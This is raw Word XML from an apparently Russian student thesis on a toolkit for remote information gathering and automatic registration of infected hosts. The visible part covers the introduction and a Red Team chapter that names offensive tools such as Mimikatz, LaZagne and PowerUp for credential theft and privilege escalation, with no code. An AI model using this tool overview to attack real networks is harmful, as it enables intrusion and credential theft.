              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>3.1 Программная реализация</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1E9FDCD0" w14:textId="4F3166E3" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:tab/>
            <w:t>3.2 Серверная часть</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
          <w:r w:rsidR="00375B3D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14:paraId="6D6B0491" w14:textId="52A4BF43" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C"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 w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
          <w:r w:rsidR="00B41F73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14:paraId="24F519C1" w14:textId="45BD5939" w:rsidR="00483920" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Список использованных источников</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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BB644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
          <w:r w:rsidR="00B41F73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14:paraId="0C14A6F8" w14:textId="7D681F4D" w:rsidR="00B41F73" w:rsidRPr="00BB644C" w:rsidRDefault="00B41F73" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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Список используемых сокращений и аббревиатур</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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30</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6ABA564D" w14:textId="0702F8FA" w:rsidR="00483920" w:rsidRPr="00BB644C" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Приложение А</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644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41F73">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>31</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6F90A8FE" w14:textId="4547F6AE" w:rsidR="002A3235" w:rsidRPr="00EA4BF1" w:rsidRDefault="00483920" w:rsidP="00B41F73">
          <w:pPr>
            <w:spacing w:line="336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B644C">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Приложение Б</w:t>
          </w:r>
          <w:r w:rsidRPr="00BB644C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41F73">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
          <w:r w:rsidR="00375B3D">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4A241A9F" w14:textId="051A2E76" w:rsidR="002A3235" w:rsidRPr="00B75050" w:rsidRDefault="00EE7791" w:rsidP="00B75050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8E7005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0F38064B" w14:textId="77777777" w:rsidR="00E91CA4" w:rsidRDefault="00B75050" w:rsidP="000A004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Вопрос безопасности – вопрос первостепенной важности</w:t>
      </w:r>
      <w:r w:rsidR="00EE779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Даже если перенести данную проблему в плоскость корпоративной среды и информационных технологий, важность не уменьшится. </w:t>
      </w:r>
      <w:r w:rsidR="00E91CA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Решение же данной проблемы – в увеличении штата сотрудников. Но не все компании могут позволить себе лишние расходы, а возможности людей не покрывают всевозрастающие объемы устройств в сетях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661E1EA0" w14:textId="4BB71BED" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000A004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1CA4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такой ситуации возник запрос в программном обеспечении, которое может за короткий промежуток времени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ыполнить сканирование сети, проверить наличие потенциальных уязвимостей и предоставить всю полученную информацию для устранения специалистами и системными администраторами. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C89CA4D" w14:textId="1820B256" w:rsidR="002A3235" w:rsidRPr="00FB663C" w:rsidRDefault="00EE7791" w:rsidP="000A004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чаще направлениями работы крупных IT компаний становятся исследовательская дея</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тельность и разработка методов, направленных на увеличение скорости обработки информации, повышения качества получаемых данных.  Прежде всего речь идет о построении систем мониторинга, которые, в первую очередь, нацелены на шпионаж и создание благоприятных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условий для развития атак на элементы инфраструктуры организаций</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [19]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D22AE36" w14:textId="618BA70E" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000A004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данным исследования компании POSITIVE TECHNOLOGIES, в 31% организаций с численностью персонала от 100 до 500 человек бюджет на ИБ составил от 5 до 10 млн рублей. Согласно информации тог</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о же анализа, 48% компаний-респондентов выделили в своем бюджете средства на внедрение средств для мониторинга и реагирования на события ИБ, в том числе на защиту от утечек информации</w:t>
      </w:r>
      <w:r w:rsidR="00FB663C" w:rsidRPr="00FB663C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [18]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802134" w14:textId="0CD4D69B" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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commentRangeStart w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью данной работы является разработка комплекса средств для </w:t>
      </w:r>
      <w:r w:rsidR="00E91CA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>удаленного сбора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1CA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступной информации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  <w:r w:rsidR="00E91CA4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1CA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и регистрация зараженного узла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автоматическом режиме. </w:t>
      </w:r>
      <w:commentRangeEnd w:id="1"/>
      <w:r>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749ECA0" w14:textId="77777777" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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обусловила постановку следующих задач:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A22AD5B" w14:textId="77777777" w:rsidR="000A0047" w:rsidRPr="000A0047" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>провести обзор предметной области средств автоматизированного проникновения и повышения привилегий;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C80AB16" w14:textId="77777777" w:rsidR="000A0047" w:rsidRPr="000A0047" w:rsidRDefault="00EE7791" w:rsidP="002948FA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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>разработать комплекс средств для успешного сбора информации;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B344DFD" w14:textId="1767FA67" w:rsidR="000A0047" w:rsidRPr="000A0047" w:rsidRDefault="0059733A" w:rsidP="002948FA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провести </w:t>
      </w:r>
      <w:r w:rsidR="00EE7791" w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тестирование разработанного решения</w:t>
      </w:r>
      <w:r w:rsidR="00F67AA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604505" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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44D391" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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753A2B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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454AF5" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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59497C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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64E188" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2CDCD2" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2049E5" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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BF955B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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D1A29F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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586A13" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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EA6393" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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FABDDF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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52C1B8" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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DE820A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2F9D70" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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B7A96D" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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EBAF56" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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B24FEE" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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B14790" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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131A95" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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EF939A" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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FE741C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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B8FEA3" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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0D69FD" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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A7E049" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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540E08" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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AB4DFB" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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DB6070" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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0F82C0" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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17E654" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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EBF18C" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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9E30D8" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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C4B606" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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87B8B5" w14:textId="0AFDFF89" w:rsidR="002A3235" w:rsidRDefault="002A32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40F480" w14:textId="4FF0A226" w:rsidR="0059733A" w:rsidRDefault="0059733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8968DD" w14:textId="7B88D70D" w:rsidR="0059733A" w:rsidRDefault="0059733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AEF5B9" w14:textId="77777777" w:rsidR="0059733A" w:rsidRDefault="0059733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C5B7E4" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="002A32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2C9240" w14:textId="69AA8D5D" w:rsidR="002A3235" w:rsidRPr="002948FA" w:rsidRDefault="00EE7791" w:rsidP="002948FA">
      <w:pPr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948F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 Системы поддержки ата</w:t>
      </w:r>
      <w:r w:rsidR="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="002948FA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 xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002948FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Парадигма Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F374CB" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="002948F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Термин Red Team пришел из военной среды и определяет «дружественную» атакующую команду. В противовес ей существует команда защитников — Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556B6395" w14:textId="2751D0A5" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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Действия Red Team</w:t>
      </w:r>
      <w:r w:rsidR="00B41F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в первую очередь всегда санкционированные, легальные действия,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правленные на взлом корпоративной сети и преследующие главную цель – выявить существующие недостатки и просчеты в проектировании и конфигурации сетей и систем предотвращения вторжения с последующим устранением выявленных недостатков. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F050FA1" w14:textId="24DD2317" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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 образом операции </w:t>
      </w:r>
      <w:r w:rsidR="000A0047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 - продвинутая и более совершенная форма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пентеста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отличия заключаются в первую очередь в регламенте действий и упреждении защищаемой стороны. Отсутствуют какие-либо практические ограничения, производится реальная атака на ин</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фраструктуру: от атак внешнего периметра, до попыток физического доступа, техник социальной инженерии (прим. не фиксация перехода по ссылке, а полноценный реверс-шел</w:t>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>л</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:commentReference w:id="2"/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0A4BEC" w:rsidRPr="000A4BEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [6]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7E76F0" w14:textId="3172AB33" w:rsidR="000A0047" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="000A004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Подход RT ближе всего соотносится с таргетированной атакой – APT</w:t>
      </w:r>
      <w:r w:rsidR="00840AF7" w:rsidRPr="00840AF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5E52E1" w14:textId="77777777" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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любой операции – получить доступ к системе любыми способами, включающими в себя тестирование на проникновение; физический доступ; тестирование линий связи, беспроводных и радиочастотных систем; тестирование сотрудников посредством сценарие</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в социальной инженерии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F3F384" w14:textId="61DDBF28" w:rsidR="000A0047" w:rsidRDefault="00EE7791" w:rsidP="000A004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 доступом чаще всего понимается получение конфиденциальных данных и их успешный вывод из атакуемой инфраструктуры на ресурсы, контролируемые членами </w:t>
      </w:r>
      <w:r w:rsidR="000A0047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025F41" w14:textId="41EA9F74" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000A004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Концепция RT операций позволяет провести работы по тестированию на про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никновение максимально реалистично, так, будто атака ведется реальными злоумышленниками. Нередки ситуации, когда в процессе подобных операций происходят негативные события – перестает выходить на связь сервер, или же пропадает доступ к сети Интернет. Чаще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всего операции проводятся на довольно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объемные инфраструктуры, и требуют применения специализированного инструментария:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0D2791" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="002948FA" w:rsidRDefault="00EE7791" w:rsidP="002948FA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Сканеры и утилиты для проведения инвентаризации периметра, с возможностью разделения рабочих зон и сведения результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3C641" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="002948FA" w:rsidRDefault="00EE7791" w:rsidP="002948FA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Системы обработ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ки данных при проведении тестирования на проникновение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9B10F" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="002948FA" w:rsidRDefault="00EE7791" w:rsidP="002948FA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средств анализа и управления уязвимостями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A799E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="002948FA" w:rsidRDefault="00EE7791" w:rsidP="002948FA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Системы проведения кампаний социальной инженерии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22389544" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="000A004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поставленных целей RT использует обширный набор программного обеспечения, серв</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>исов и физических устройств, перечислим наиболее популярные из них, разбив по категориям:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D21FE4" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Методы доставки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A484940" w14:textId="0D572FD1" w:rsidR="002A3235" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Gophish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – платформа, позволяющая легко и быстро развернуть фишинговые атаки;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6593B01F" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Повышение привилегий:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399C5C17" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PowerUp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – средство </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, которое предлагает проверку на наличие распространенных неправильных конфигураций Windows, ряд атак направленных на повышение </w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>привилегий;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590B7A1E" w14:textId="615FF73A" w:rsidR="002A3235" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – средство визуализации и отображения списков управления доступом, пользователей и связей между ними;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C17E291" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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48FA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Боковое движение:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289178DC" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – инструмент с открытым исходным кодом для деятельности после эксплуатации – в том числе позволяет извлекать и собирать информацию о учетных данных Windows из целевого объекта, может применяться для создания золотых билетов;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6776834C" w14:textId="77777777" w:rsidR="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PAExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – инструмент, п</w:t>
      </w:r>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>редназначенный для облегчения связи с удаленными компьютерами, путем исключения необходимости установки клиентского программного обеспечения;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFBD8D" w14:textId="2E6157EA" w:rsidR="002A3235" w:rsidRPr="00840AF7" w:rsidRDefault="00EE7791" w:rsidP="00840AF7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40AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LaZagne</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00840AF7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
